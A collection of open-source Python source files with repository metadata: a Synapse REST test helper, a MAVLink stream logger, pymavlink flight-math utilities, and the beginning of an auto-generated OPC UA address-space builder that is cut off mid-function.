Procedure* procedures;
}
/*
class Garbage {
Garbage garbage;
}
*/
class Partition {
bool isActive;
Range* ranges;
Replica* replicas;
}
class Table {
int type;
Table? buddy1;
Table? buddy2;
Column* columns;
Index* indexes;
Constraint* constraints;
}
class Program {
Program* programs;
Procedure* procedures;
Table* tables;
}
"""
def checkeq( a, b ):
if a != b:
raise Exception( 'test failed: %r != %r' % (a,b) )
|
apavlo/h-store
|
src/catgen/catalog_utils/testdata.py
|
Python
|
gpl-3.0
| 1,429
| 0.004899
|
# -*- coding: utf-8 -*-
# Copyright 2014 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# twisted imports
from twisted.internet import defer
# trial imports
from tests import unittest
from synapse.api.constants import Membership
import json
import time
class RestTestCase(unittest.TestCase):
"""Contains extra helper functions to quickly and clearly perform a given
REST action, which isn't the focus of the test.
This subclass assumes there are mock_resource and auth_user_id attributes.
"""
def __init__(self, *args, **kwargs):
super(RestTestCase, self).__init__(*args, **kwargs)
self.mock_resource = None
self.auth_user_id = None
def mock_get_user_by_token(self, token=None):
return self.auth_user_id
@defer.inlineCallbacks
def create_room_as(self, room_creator, is_public=True, tok=None):
temp_id = self.auth_user_id
self.auth_user_id = room_creator
path = "/createRoom"
content = "{}"
if not is_public:
content = '{"visibility":"private"}'
if tok:
path = path + "?access_token=%s" % tok
(code, response) = yield self.mock_resource.trigger("POST", path, content)
self.assertEquals(200, code, msg=str(response))
self.auth_user_id = temp_id
defer.returnValue(response["room_id"])
@defer.inlineCallbacks
def invite(self, room=None, src=None, targ=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=src, targ=targ, tok=tok,
membership=Membership.INVITE,
expect_code=expect_code)
@defer.inlineCallbacks
def join(self, room=None, user=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=user, targ=user, tok=tok,
membership=Membership.JOIN,
expect_code=expect_code)
@defer.inlineCallbacks
def leave(self, room=None, user=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=user, targ=user, tok=tok,
membership=Membership.LEAVE,
expect_code=expect_code)
@defer.inlineCallbacks
def change_membership(self, room, src, targ, membership, tok=None,
expect_code=200):
temp_id = self.auth_user_id
self.auth_user_id = src
path = "/rooms/%s/state/m.room.member/%s" % (room, targ)
if tok:
path = path + "?access_token=%s" % tok
data = {
"membership": membership
}
(code, response) = yield self.mock_resource.trigger("PUT", path,
json.dumps(data))
self.assertEquals(expect_code, code, msg=str(response))
self.auth_user_id = temp_id
@defer.inlineCallbacks
def register(self, user_id):
(code, response) = yield self.mock_resource.trigger(
"POST",
"/register",
json.dumps({
"user": user_id,
"password": "test",
"type": "m.login.password"
}))
self.assertEquals(200, code)
defer.returnValue(response)
@defer.inlineCallbacks
def send(self, room_id, body=None, txn_id=None, tok=None,
expect_code=200):
if txn_id is None:
txn_id = "m%s" % (str(time.time()))
if body is None:
body = "body_text_here"
path = "/rooms/%s/send/m.room.message/%s" % (room_id, txn_id)
content = '{"msgtype":"m.text","body":"%s"}' % body
if tok:
path = path + "?access_token=%s" % tok
(code, response) = yield self.mock_resource.trigger("PUT", path, content)
self.assertEquals(expect_code, code, msg=str(response))
def assert_dict(self, required, actual):
"""Does a partial assert of a dict.
Args:
required (dict): The keys and value which MUST be in 'actual'.
actual (dict): The test result. Extra keys will not be checked.
"""
for key in required:
self.assertEquals(required[key], actual[key],
msg="%s mismatch. %s" % (key, actual))
|
rzr/synapse
|
tests/rest/client/v1/utils.py
|
Python
|
apache-2.0
| 4,828
| 0.000829
|
"""Log MAVLink stream."""
import argparse
from pymavlink import mavutil
import pymavlink.dialects.v10.ceaufmg as mavlink
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--verbose", action='store_true',
help="print messages to STDOUT")
parser.add_argument("--device", required=True, help="serial port")
parser.add_argument("--log", type=argparse.FileType('w'),
help="Log file")
parser.add_argument("--baudrate", type=int, help="serial port baud rate",
default=57600)
args = parser.parse_args()
conn = mavutil.mavlink_connection(args.device, baud=args.baudrate)
conn.logfile = args.log
while True:
msg = conn.recv_msg()
if args.verbose and msg is not None:
print(msg)
if __name__ == '__main__':
main()
|
cea-ufmg/pyfdas
|
pyfdas/mavlog.py
|
Python
|
mit
| 891
| 0.001122
|
#!/usr/bin/env python
'''
useful extra functions for use by mavlink clients
Copyright Andrew Tridgell 2011
Released under GNU GPL version 3 or later
'''
import os, sys
from math import *
sys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), 'examples'))
try:
# rotmat doesn't work on Python3.2 yet
from rotmat import Vector3, Matrix3
except Exception:
pass
def kmh(mps):
'''convert m/s to Km/h'''
return mps*3.6
def altitude(SCALED_PRESSURE, ground_pressure=None, ground_temp=None):
'''calculate barometric altitude'''
import mavutil
self = mavutil.mavfile_global
if ground_pressure is None:
if self.param('GND_ABS_PRESS', None) is None:
return 0
ground_pressure = self.param('GND_ABS_PRESS', 1)
if ground_temp is None:
ground_temp = self.param('GND_TEMP', 0)
scaling = ground_pressure / (SCALED_PRESSURE.press_abs*100.0)
temp = ground_temp + 273.15
return log(scaling) * temp * 29271.267 * 0.001
def mag_heading(RAW_IMU, ATTITUDE, declination=None, SENSOR_OFFSETS=None, ofs=None):
'''calculate heading from raw magnetometer'''
if declination is None:
import mavutil
declination = degrees(mavutil.mavfile_global.param('COMPASS_DEC', 0))
mag_x = RAW_IMU.xmag
mag_y = RAW_IMU.ymag
mag_z = RAW_IMU.zmag
if SENSOR_OFFSETS is not None and ofs is not None:
mag_x += ofs[0] - SENSOR_OFFSETS.mag_ofs_x
mag_y += ofs[1] - SENSOR_OFFSETS.mag_ofs_y
mag_z += ofs[2] - SENSOR_OFFSETS.mag_ofs_z
headX = mag_x*cos(ATTITUDE.pitch) + mag_y*sin(ATTITUDE.roll)*sin(ATTITUDE.pitch) + mag_z*cos(ATTITUDE.roll)*sin(ATTITUDE.pitch)
headY = mag_y*cos(ATTITUDE.roll) - mag_z*sin(ATTITUDE.roll)
heading = degrees(atan2(-headY,headX)) + declination
if heading < 0:
heading += 360
return heading
def mag_field(RAW_IMU, SENSOR_OFFSETS=None, ofs=None):
'''calculate magnetic field strength from raw magnetometer'''
mag_x = RAW_IMU.xmag
mag_y = RAW_IMU.ymag
mag_z = RAW_IMU.zmag
if SENSOR_OFFSETS is not None and ofs is not None:
mag_x += ofs[0] - SENSOR_OFFSETS.mag_ofs_x
mag_y += ofs[1] - SENSOR_OFFSETS.mag_ofs_y
mag_z += ofs[2] - SENSOR_OFFSETS.mag_ofs_z
return sqrt(mag_x**2 + mag_y**2 + mag_z**2)
def angle_diff(angle1, angle2):
'''show the difference between two angles in degrees'''
ret = angle1 - angle2
if ret > 180:
ret -= 360;
if ret < -180:
ret += 360
return ret
average_data = {}
def average(var, key, N):
'''average over N points'''
global average_data
if not key in average_data:
average_data[key] = [var]*N
return var
average_data[key].pop(0)
average_data[key].append(var)
return sum(average_data[key])/N
derivative_data = {}
def second_derivative_5(var, key):
'''5 point 2nd derivative'''
global derivative_data
import mavutil
tnow = mavutil.mavfile_global.timestamp
if not key in derivative_data:
derivative_data[key] = (tnow, [var]*5)
return 0
(last_time, data) = derivative_data[key]
data.pop(0)
data.append(var)
derivative_data[key] = (tnow, data)
h = (tnow - last_time)
# N=5 2nd derivative from
# http://www.holoborodko.com/pavel/numerical-methods/numerical-derivative/smooth-low-noise-differentiators/
ret = ((data[4] + data[0]) - 2*data[2]) / (4*h**2)
return ret
def second_derivative_9(var, key):
'''9 point 2nd derivative'''
global derivative_data
import mavutil
tnow = mavutil.mavfile_global.timestamp
if not key in derivative_data:
derivative_data[key] = (tnow, [var]*9)
return 0
(last_time, data) = derivative_data[key]
data.pop(0)
data.append(var)
derivative_data[key] = (tnow, data)
h = (tnow - last_time)
# N=5 2nd derivative from
# http://www.holoborodko.com/pavel/numerical-methods/numerical-derivative/smooth-low-noise-differentiators/
f = data
ret = ((f[8] + f[0]) + 4*(f[7] + f[1]) + 4*(f[6]+f[2]) - 4*(f[5]+f[3]) - 10*f[4])/(64*h**2)
return ret
lowpass_data = {}
def lowpass(var, key, factor):
'''a simple lowpass filter'''
global lowpass_data
if not key in lowpass_data:
lowpass_data[key] = var
else:
lowpass_data[key] = factor*lowpass_data[key] + (1.0 - factor)*var
return lowpass_data[key]
last_diff = {}
def diff(var, key):
'''calculate differences between values'''
global last_diff
ret = 0
if not key in last_diff:
last_diff[key] = var
return 0
ret = var - last_diff[key]
last_diff[key] = var
return ret
last_delta = {}
def delta(var, key, tusec=None):
'''calculate slope'''
global last_delta
if tusec is not None:
tnow = tusec * 1.0e-6
else:
import mavutil
tnow = mavutil.mavfile_global.timestamp
dv = 0
ret = 0
if key in last_delta:
(last_v, last_t, last_ret) = last_delta[key]
if last_t == tnow:
return last_ret
if tnow == last_t:
ret = 0
else:
ret = (var - last_v) / (tnow - last_t)
last_delta[key] = (var, tnow, ret)
return ret
def delta_angle(var, key, tusec=None):
'''calculate slope of an angle'''
global last_delta
if tusec is not None:
tnow = tusec * 1.0e-6
else:
import mavutil
tnow = mavutil.mavfile_global.timestamp
dv = 0
ret = 0
if key in last_delta:
(last_v, last_t, last_ret) = last_delta[key]
if last_t == tnow:
return last_ret
if tnow == last_t:
ret = 0
else:
dv = var - last_v
if dv > 180:
dv -= 360
if dv < -180:
dv += 360
ret = dv / (tnow - last_t)
last_delta[key] = (var, tnow, ret)
return ret
def roll_estimate(RAW_IMU,GPS_RAW_INT=None,ATTITUDE=None,SENSOR_OFFSETS=None, ofs=None, mul=None,smooth=0.7):
'''estimate roll from accelerometer'''
rx = RAW_IMU.xacc * 9.81 / 1000.0
ry = RAW_IMU.yacc * 9.81 / 1000.0
rz = RAW_IMU.zacc * 9.81 / 1000.0
if ATTITUDE is not None and GPS_RAW_INT is not None:
ry -= ATTITUDE.yawspeed * GPS_RAW_INT.vel*0.01
rz += ATTITUDE.pitchspeed * GPS_RAW_INT.vel*0.01
if SENSOR_OFFSETS is not None and ofs is not None:
rx += SENSOR_OFFSETS.accel_cal_x
ry += SENSOR_OFFSETS.accel_cal_y
rz += SENSOR_OFFSETS.accel_cal_z
rx -= ofs[0]
ry -= ofs[1]
rz -= ofs[2]
if mul is not None:
rx *= mul[0]
ry *= mul[1]
rz *= mul[2]
return lowpass(degrees(-asin(ry/sqrt(rx**2+ry**2+rz**2))),'_roll',smooth)
def pitch_estimate(RAW_IMU, GPS_RAW_INT=None,ATTITUDE=None, SENSOR_OFFSETS=None, ofs=None, mul=None, smooth=0.7):
'''estimate pitch from accelerometer'''
rx = RAW_IMU.xacc * 9.81 / 1000.0
ry = RAW_IMU.yacc * 9.81 / 1000.0
rz = RAW_IMU.zacc * 9.81 / 1000.0
if ATTITUDE is not None and GPS_RAW_INT is not None:
ry -= ATTITUDE.yawspeed * GPS_RAW_INT.vel*0.01
rz += ATTITUDE.pitchspeed * GPS_RAW_INT.vel*0.01
if SENSOR_OFFSETS is not None and ofs is not None:
rx += SENSOR_OFFSETS.accel_cal_x
ry += SENSOR_OFFSETS.accel_cal_y
rz += SENSOR_OFFSETS.accel_cal_z
rx -= ofs[0]
ry -= ofs[1]
rz -= ofs[2]
if mul is not None:
rx *= mul[0]
ry *= mul[1]
rz *= mul[2]
return lowpass(degrees(asin(rx/sqrt(rx**2+ry**2+rz**2))),'_pitch',smooth)
def rotation(ATTITUDE):
'''return the current DCM rotation matrix'''
r = Matrix3()
r.from_euler(ATTITUDE.roll, ATTITUDE.pitch, ATTITUDE.yaw)
return r
def mag_rotation(RAW_IMU, inclination, declination):
'''return an attitude rotation matrix that is consistent with the current mag
vector'''
m_body = Vector3(RAW_IMU.xmag, RAW_IMU.ymag, RAW_IMU.zmag)
m_earth = Vector3(m_body.length(), 0, 0)
r = Matrix3()
r.from_euler(0, -radians(inclination), radians(declination))
m_earth = r * m_earth
r.from_two_vectors(m_earth, m_body)
return r
def mag_yaw(RAW_IMU, inclination, declination):
'''estimate yaw from mag'''
m = mag_rotation(RAW_IMU, inclination, declination)
(r, p, y) = m.to_euler()
y = degrees(y)
if y < 0:
y += 360
return y
def mag_pitch(RAW_IMU, inclination, declination):
'''estimate pithc from mag'''
m = mag_rotation(RAW_IMU, inclination, declination)
(r, p, y) = m.to_euler()
return degrees(p)
def mag_roll(RAW_IMU, inclination, declination):
'''estimate roll from mag'''
m = mag_rotation(RAW_IMU, inclination, declination)
(r, p, y) = m.to_euler()
return degrees(r)
def expected_mag(RAW_IMU, ATTITUDE, inclination, declination):
'''return expected mag vector'''
m_body = Vector3(RAW_IMU.xmag, RAW_IMU.ymag, RAW_IMU.zmag)
field_strength = m_body.length()
m = rotation(ATTITUDE)
r = Matrix3()
r.from_euler(0, -radians(inclination), radians(declination))
m_earth = r * Vector3(field_strength, 0, 0)
return m.transposed() * m_earth
def mag_discrepancy(RAW_IMU, ATTITUDE, inclination, declination=None):
'''give the magnitude of the discrepancy between observed and expected magnetic field'''
if declination is None:
import mavutil
declination = degrees(mavutil.mavfile_global.param('COMPASS_DEC', 0))
expected = expected_mag(RAW_IMU, ATTITUDE, inclination, declination)
mag = Vector3(RAW_IMU.xmag, RAW_IMU.ymag, RAW_IMU.zmag)
return degrees(expected.angle(mag))
def mag_inclination(RAW_IMU, ATTITUDE, declination=None):
'''give the magnitude of the discrepancy between observed and expected magnetic field'''
if declination is None:
import mavutil
declination = degrees(mavutil.mavfile_global.param('COMPASS_DEC', 0))
r = rotation(ATTITUDE)
mag1 = Vector3(RAW_IMU.xmag, RAW_IMU.ymag, RAW_IMU.zmag)
mag1 = r * mag1
mag2 = Vector3(cos(radians(declination)), sin(radians(declination)), 0)
inclination = degrees(mag1.angle(mag2))
if RAW_IMU.zmag < 0:
inclination = -inclination
return inclination
def expected_magx(RAW_IMU, ATTITUDE, inclination, declination):
'''estimate from mag'''
v = expected_mag(RAW_IMU, ATTITUDE, inclination, declination)
return v.x
def expected_magy(RAW_IMU, ATTITUDE, inclination, declination):
'''estimate from mag'''
v = expected_mag(RAW_IMU, ATTITUDE, inclination, declination)
return v.y
def expected_magz(RAW_IMU, ATTITUDE, inclination, declination):
'''estimate from mag'''
v = expected_mag(RAW_IMU, ATTITUDE, inclination, declination)
return v.z
def gravity(RAW_IMU, SENSOR_OFFSETS=None, ofs=None, mul=None, smooth=0.7):
'''estimate pitch from accelerometer'''
rx = RAW_IMU.xacc * 9.81 / 1000.0
ry = RAW_IMU.yacc * 9.81 / 1000.0
rz = RAW_IMU.zacc * 9.81 / 1000.0
if SENSOR_OFFSETS is not None and ofs is not None:
rx += SENSOR_OFFSETS.accel_cal_x
ry += SENSOR_OFFSETS.accel_cal_y
rz += SENSOR_OFFSETS.accel_cal_z
rx -= ofs[0]
ry -= ofs[1]
rz -= ofs[2]
if mul is not None:
rx *= mul[0]
ry *= mul[1]
rz *= mul[2]
return lowpass(sqrt(rx**2+ry**2+rz**2),'_gravity',smooth)
def pitch_sim(SIMSTATE, GPS_RAW):
'''estimate pitch from SIMSTATE accels'''
xacc = SIMSTATE.xacc - lowpass(delta(GPS_RAW.v,"v")*6.6, "v", 0.9)
zacc = SIMSTATE.zacc
zacc += SIMSTATE.ygyro * GPS_RAW.v;
if xacc/zacc >= 1:
return 0
if xacc/zacc <= -1:
return -0
return degrees(-asin(xacc/zacc))
def distance_two(GPS_RAW1, GPS_RAW2):
'''distance between two points'''
if hasattr(GPS_RAW1, 'cog'):
lat1 = radians(GPS_RAW1.lat)*1.0e-7
lat2 = radians(GPS_RAW2.lat)*1.0e-7
lon1 = radians(GPS_RAW1.lon)*1.0e-7
lon2 = radians(GPS_RAW2.lon)*1.0e-7
else:
lat1 = radians(GPS_RAW1.lat)
lat2 = radians(GPS_RAW2.lat)
lon1 = radians(GPS_RAW1.lon)
lon2 = radians(GPS_RAW2.lon)
dLat = lat2 - lat1
dLon = lon2 - lon1
a = sin(0.5*dLat)**2 + sin(0.5*dLon)**2 * cos(lat1) * cos(lat2)
c = 2.0 * atan2(sqrt(a), sqrt(1.0-a))
return 6371 * 1000 * c
first_fix = None
def distance_home(GPS_RAW):
'''distance from first fix point'''
global first_fix
if GPS_RAW.fix_type < 2:
return 0
if first_fix == None or first_fix.fix_type < 2:
first_fix = GPS_RAW
return 0
return distance_two(GPS_RAW, first_fix)
def sawtooth(ATTITUDE, amplitude=2.0, period=5.0):
'''sawtooth pattern based on uptime'''
mins = (ATTITUDE.usec * 1.0e-6)/60
p = fmod(mins, period*2)
if p < period:
return amplitude * (p/period)
return amplitude * (period - (p-period))/period
def rate_of_turn(speed, bank):
'''return expected rate of turn in degrees/s for given speed in m/s and
bank angle in degrees'''
if abs(speed) < 2 or abs(bank) > 80:
return 0
ret = degrees(9.81*tan(radians(bank))/speed)
return ret
def wingloading(bank):
'''return expected wing loading factor for a bank angle in radians'''
return 1.0/cos(bank)
def airspeed(VFR_HUD, ratio=None):
'''recompute airspeed with a different ARSPD_RATIO'''
import mavutil
mav = mavutil.mavfile_global
if ratio is None:
ratio = 1.98 # APM default
if 'ARSPD_RATIO' in mav.params:
used_ratio = mav.params['ARSPD_RATIO']
else:
used_ratio = ratio
airspeed_pressure = (VFR_HUD.airspeed**2) / used_ratio
airspeed = sqrt(airspeed_pressure * ratio)
return airspeed
def earth_rates(ATTITUDE):
'''return angular velocities in earth frame'''
from math import sin, cos, tan, fabs
p = ATTITUDE.rollspeed
q = ATTITUDE.pitchspeed
r = ATTITUDE.yawspeed
phi = ATTITUDE.roll
theta = ATTITUDE.pitch
psi = ATTITUDE.yaw
phiDot = p + tan(theta)*(q*sin(phi) + r*cos(phi))
thetaDot = q*cos(phi) - r*sin(phi)
if fabs(cos(theta)) < 1.0e-20:
theta += 1.0e-10
psiDot = (q*sin(phi) + r*cos(phi))/cos(theta)
return (phiDot, thetaDot, psiDot)
def roll_rate(ATTITUDE):
'''return roll rate in earth frame'''
(phiDot, thetaDot, psiDot) = earth_rates(ATTITUDE)
return phiDot
def pitch_rate(ATTITUDE):
'''return pitch rate in earth frame'''
(phiDot, thetaDot, psiDot) = earth_rates(ATTITUDE)
return thetaDot
def yaw_rate(ATTITUDE):
'''return yaw rate in earth frame'''
(phiDot, thetaDot, psiDot) = earth_rates(ATTITUDE)
return psiDot
def gps_velocity(GPS_RAW_INT):
'''return GPS velocity vector'''
return Vector3(GPS_RAW_INT.vel*0.01*cos(radians(GPS_RAW_INT.cog*0.01)),
GPS_RAW_INT.vel*0.01*sin(radians(GPS_RAW_INT.cog*0.01)), 0)
def gps_velocity_body(GPS_RAW_INT, ATTITUDE):
'''return GPS velocity vector in body frame'''
r = rotation(ATTITUDE)
return r.transposed() * Vector3(GPS_RAW_INT.vel*0.01*cos(radians(GPS_RAW_INT.cog*0.01)),
GPS_RAW_INT.vel*0.01*sin(radians(GPS_RAW_INT.cog*0.01)),
-tan(ATTITUDE.pitch)*GPS_RAW_INT.vel*0.01)
def earth_accel(RAW_IMU,ATTITUDE):
'''return earth frame acceleration vector'''
r = rotation(ATTITUDE)
accel = Vector3(RAW_IMU.xacc, RAW_IMU.yacc, RAW_IMU.zacc) * 9.81 * 0.001
return r * accel
def earth_gyro(RAW_IMU,ATTITUDE):
'''return earth frame gyro vector'''
r = rotation(ATTITUDE)
accel = Vector3(degrees(RAW_IMU.xgyro), degrees(RAW_IMU.ygyro), degrees(RAW_IMU.zgyro)) * 0.001
return r * accel
def airspeed_energy_error(NAV_CONTROLLER_OUTPUT, VFR_HUD):
'''return airspeed energy error matching APM internals
This is positive when we are going too slow
'''
aspeed_cm = VFR_HUD.airspeed*100
target_airspeed = NAV_CONTROLLER_OUTPUT.aspd_error + aspeed_cm
airspeed_energy_error = ((target_airspeed*target_airspeed) - (aspeed_cm*aspeed_cm))*0.00005
return airspeed_energy_error
def energy_error(NAV_CONTROLLER_OUTPUT, VFR_HUD):
'''return energy error matching APM internals
This is positive when we are too low or going too slow
'''
aspeed_energy_error = airspeed_energy_error(NAV_CONTROLLER_OUTPUT, VFR_HUD)
alt_error = NAV_CONTROLLER_OUTPUT.alt_error*100
energy_error = aspeed_energy_error + alt_error*0.098
return energy_error
|
trunetcopter/trunetcopter
|
gui/pymavlink/mavextra.py
|
Python
|
gpl-3.0
| 16,655
| 0.005344
|
# -*- coding: utf-8 -*-
"""
DO NOT EDIT THIS FILE!
It is automatically generated from opcfoundation.org schemas.
"""
from opcua import ua
from opcua.ua import NodeId, QualifiedName, NumericNodeId, StringNodeId, GuidNodeId
from opcua.ua import NodeClass, LocalizedText
def create_standard_address_space_Part11(server):
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(56, 0)
node.BrowseName = QualifiedName('HasHistoricalConfiguration', 0)
node.NodeClass = NodeClass.ReferenceType
node.ParentNodeId = NumericNodeId(44, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.ReferenceTypeAttributes()
attrs.Description = LocalizedText("The type for a reference to the historical configuration for a data variable.")
attrs.DisplayName = LocalizedText("HasHistoricalConfiguration")
attrs.InverseName = LocalizedText("HistoricalConfigurationOf")
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(56, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(44, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11192, 0)
node.BrowseName = QualifiedName('HistoryServerCapabilities', 0)
node.NodeClass = NodeClass.Object
node.ParentNodeId = NumericNodeId(2268, 0)
node.ReferenceTypeId = NumericNodeId(47, 0)
node.TypeDefinition = NumericNodeId(2330, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("HistoryServerCapabilities")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11193, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11242, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11273, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11274, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11196, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11197, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11198, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11199, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11200, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11281, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11282, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11283, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11502, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11275, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11201, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2268, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11193, 0)
node.BrowseName = QualifiedName('AccessHistoryDataCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("AccessHistoryDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11193, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11193, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11242, 0)
node.BrowseName = QualifiedName('AccessHistoryEventsCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("AccessHistoryEventsCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11242, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11242, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11273, 0)
node.BrowseName = QualifiedName('MaxReturnDataValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("MaxReturnDataValues")
attrs.DataType = ua.NodeId(ua.ObjectIds.UInt32)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
